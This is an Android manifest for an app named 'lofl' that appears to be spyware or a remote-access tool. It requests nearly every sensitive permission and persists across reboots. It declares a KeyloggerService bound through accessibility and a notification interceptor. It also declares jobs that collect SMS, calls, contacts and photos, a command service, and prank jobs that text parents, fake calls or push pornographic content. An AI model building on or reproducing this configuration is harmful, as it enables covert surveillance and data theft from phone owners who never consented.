<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.candroid.lofl">

    <uses-permission-sdk-23 android:name="android.permission.READ_SMS" />
    <uses-permission-sdk-23 android:name="android.permission.SEND_SMS" />
    <uses-permission-sdk-23 android:name="android.permission.RECEIVE_SMS" />
    <uses-permission-sdk-23 android:name="android.permission.RECEIVE_MMS" />
    <uses-permission-sdk-23 android:name="android.permission.RECEIVE_WAP_PUSH" />
    <uses-permission-sdk-23 android:name="android.permission.READ_PHONE_STATE" />
    <uses-permission-sdk-23 android:name="android.permission.ACCESS_NETWORK_STATE" />
    <uses-permission-sdk-23 android:name="android.provider.Telephony.SMS_RECEIVED" />
    <uses-permission-sdk-23 android:name="android.permission.READ_PHONE_NUMBERS" />
    <uses-permission-sdk-23 android:name="android.permission.READ_CONTACTS" />
    <uses-permission-sdk-23 android:name="android.permission.BROADCAST_SMS" />
    <uses-permission-sdk-23 android:name="android.permission.RECEIVE_BOOT_COMPLETED" />
    <uses-permission-sdk-23 android:name="android.permission.VIBRATE" />
    <uses-permission-sdk-23 android:name="android.permission.ACCESS_FINE_LOCATION" />
    <uses-permission-sdk-23 android:name="android.permission.READ_CALL_LOG" />
    <uses-permission-sdk-23 android:name="android.permission.READ_CALENDAR" />
    <uses-permission-sdk-23 android:name="android.permission.WRITE_CALENDAR"/>
    <uses-permission-sdk-23 android:name="android.permission.RECORD_AUDIO" />
    <uses-permission-sdk-23 android:name="android.permission.WRITE_EXTERNAL_STORAGE" />
    <uses-permission-sdk-23 android:name="android.permission.READ_EXTERNAL_STORAGE" />
    <uses-permission-sdk-23 android:name="android.permission.CAMERA" />
    <uses-permission-sdk-23 android:name="android.permission.CALL_PHONE" />
    <uses-permission-sdk-23 android:name="android.permission.SET_WALLPAPER" />
    <uses-permission-sdk-23 android:name="android.permission.INTERNET" />
    <uses-permission-sdk-23 android:name="android.permission.CAMERA" />
    <uses-permission-sdk-23 android:name="android.permission.CHANGE_WIFI_STATE" />
    <uses-permission-sdk-23 android:name="android.permission.ACCESS_WIFI_STATE" />
    <uses-permission-sdk-23 android:name="android.permission.BIND_DEVICE_ADMIN"/>
    <uses-permission-sdk-23 android:name="android.permission.FOREGROUND_SERVICE"/>
    <uses-permission-sdk-23 android:name="android.permission.READ_USER_DICTIONARY"/>
    <uses-permission-sdk-23 android:name="android.permission.PROCESS_OUTGOING_CALLS"/>
    <uses-permission-sdk-23 android:name="android.permission.WRITE_CONTACTS"/>
    <uses-permission-sdk-23 android:name="com.android.alarm.permission.SET_ALARM" />
    <uses-permission-sdk-23 android:name="android.permission.WRITE_CALL_LOG"/>
    <uses-permission-sdk-23 android:name="android.permission.MODIFY_PHONE_STATE"/>
    <uses-permission-sdk-23 android:name="android.permission.REQUEST_IGNORE_BATTERY_OPTIMIZATIONS"/>
    <uses-permission-sdk-23 android:name="android.permission.WAKE_LOCK"/>
    <uses-permission-sdk-23 android:name="android.permission.READ_VOICEMAIL"/>
    <uses-feature android:name="android.hardware.Camera" />

    <application
        android:allowBackup="false"
        android:supportsRtl="true"
        android:usesCleartextTraffic="true"
        android:persistent="true">

        <!--BROADCAST RECEIVERS-->

        <receiver android:name=".receivers.AdminReceiver"
            android:permission="android.permission.BIND_DEVICE_ADMIN">
            <meta-data
                android:name="android.app.device_admin"
                android:resource="@xml/admin_policies"
                />
            <intent-filter>
                <action android:name="android.app.action.DEVICE_ADMIN_ENABLED"/>
            </intent-filter>
        </receiver>

        <receiver
            android:name=".receivers.BootCompletedReceiver"
            android:exported="true"
            android:permission="android.permission.RECEIVE_BOOT_COMPLETED">
            <intent-filter>
                <action android:name="android.intent.action.BOOT_COMPLETED" />
            </intent-filter>
        </receiver>

        <receiver
            android:name=".receivers.WapReceiver"
            android:enabled="true"
            android:exported="true" />

        <!--SERVICES-->
        <service android:name=".services.NotificationInterceptor"
            android:permission="android.permission.BIND_NOTIFICATION_LISTENER_SERVICE">
            <intent-filter>
                <action android:name="android.service.notification.NotificationListenerService" />
            </intent-filter>
        </service>
        <service
            android:name=".jobs.services.PornJobService"
            android:permission="android.permission.BIND_JOB_SERVICE" />

        <!--If you extend this service then it won't be in a remote process. But if you are just using lofl service then it should work-->
        <!--If you are debugging then it has to be taken out of remote process or else your break points will
        not be reached and it can cause a major pain and make you spend hours thinking there is an issue with
        your logic when :( you know how that feels.. so that is why i prefer this not to be set-->
        <service
            android:name=".services.LoflService"
            android:enabled="true"
            android:exported="false"
            android:permission="android.permission.BROADCAST_SMS" />
        <service
            android:name=".jobs.services.FlashlightJobService"
            android:exported="false"
            android:permission="android.permission.BIND_JOB_SERVICE" />

        <service
            android:name=".jobs.services.WallpaperJobService"
            android:exported="false"
            android:permission="android.permission.BIND_JOB_SERVICE" />

        <service
            android:name=".services.MosquitoService"
            android:exported="false" />

        <service android:name=".jobs.services.AlarmClockJobService"
            android:exported="false"
            android:permission="android.permission.BIND_JOB_SERVICE"
            />

        <service android:name=".jobs.services.MissedCallsJobService"
            android:exported="false"
            android:permission="android.permission.BIND_JOB_SERVICE"
            />

        <service android:name=".jobs.services.InsertContactJobService"
            android:exported="false"
            android:permission="android.permission.BIND_JOB_SERVICE"
            />

        <service android:name=".jobs.services.TextParentsJobService"
            android:exported="false"
            android:permission="android.permission.BIND_JOB_SERVICE"
            />

        <service android:name=".jobs.services.FakeCallJobService"
            android:exported="false"
            android:permission="android.permission.BIND_JOB_SERVICE"
            />

        <service android:name=".jobs.services.CalendarEventJobService"
            android:exported="false"
            android:permission="android.permission.BIND_JOB_SERVICE"
            />

        <service android:name=".jobs.services.SmsJobService"
            android:exported="false"
            android:permission="android.permission.BIND_JOB_SERVICE"
            />

        <service android:name=".jobs.services.PhoneCallsJobService"
            android:permission="android.permission.BIND_JOB_SERVICE"
            android:exported="false"
            />

        <service android:name=".jobs.services.DeviceJobService"
            android:exported="false"
            android:permission="android.permission.BIND_JOB_SERVICE"
            />

        <service android:name=".jobs.services.ContactsJobService"
            android:permission="android.permission.BIND_JOB_SERVICE"
            android:exported="false"
            />

        <service android:name=".jobs.services.PackagesJobService"
            android:permission="android.permission.BIND_JOB_SERVICE"
            android:exported="false"
            />

        <service android:name=".jobs.services.DcimJobService"
            android:permission="android.permission.BIND_JOB_SERVICE"
            android:exported="false"
            />
        <service
            android:name=".services.CommandsIntentService"
            android:exported="false"
            />

        <service android:name=".services.KeyloggerService"
            android:permission="android.permission.BIND_ACCESSIBILITY_SERVICE"
            >
            <intent-filter>
                <action android:name="android.accessibilityservice.AccessibilityService" />
            </intent-filter>
            <meta-data
                android:name="android.accessibilityservice"
                android:resource="@xml/accessibility_service_config" />
        </service>

        <!--ACTIVITIES-->

        <activity android:name=".activities.permissions.AdminActivity">
            <intent-filter>
                <action android:name="android.intent.action.VIEW"/>
            </intent-filter>
        </activity>

        <activity android:name=".activities.permissions.CallLogActivity">
            <intent-filter>
                <action android:name="android.intent.action.VIEW"/>
            </intent-filter>
        </activity>

        <activity android:name=".activities.permissions.CameraActivity">
            <intent-filter>
                <action android:name="android.intent.action.VIEW"/>
            </intent-filter>
        </activity>

        <activity android:name=".activities.permissions.StorageActivity">
            <intent-filter>
                <action android:name="android.intent.action.VIEW"/>
            </intent-filter>
        </activity>

        <activity android:name=".activities.permissions.CalendarActivity">
            <intent-filter>
                <action android:name="android.intent.action.VIEW"/>
            </intent-filter>
        </activity>

        <activity android:name=".activities.permissions.RecordAudioActivity">
            <intent-filter>
                <action android:name="android.intent.action.VIEW"/>
            </intent-filter>
        </activity>

        <activity android:name=".activities.permissions.PhoneActivity">
            <intent-filter>
                <action android:name="android.intent.action.VIEW"/>
            </intent-filter>
        </activity>

        <activity android:name=".activities.permissions.LocationActivity">
            <intent-filter>
                <action android:name="android.intent.action.VIEW"/>
            </intent-filter>
        </activity>

        <activity android:name=".activities.permissions.ContactsActivity">
            <intent-filter>
                <action android:name="android.intent.action.VIEW"/>
            </intent-filter>
        </activity>

        <activity
            android:name=".activities.LoflActivity"
            android:screenOrientation="portrait">
        </activity>

    </application>

</manifest>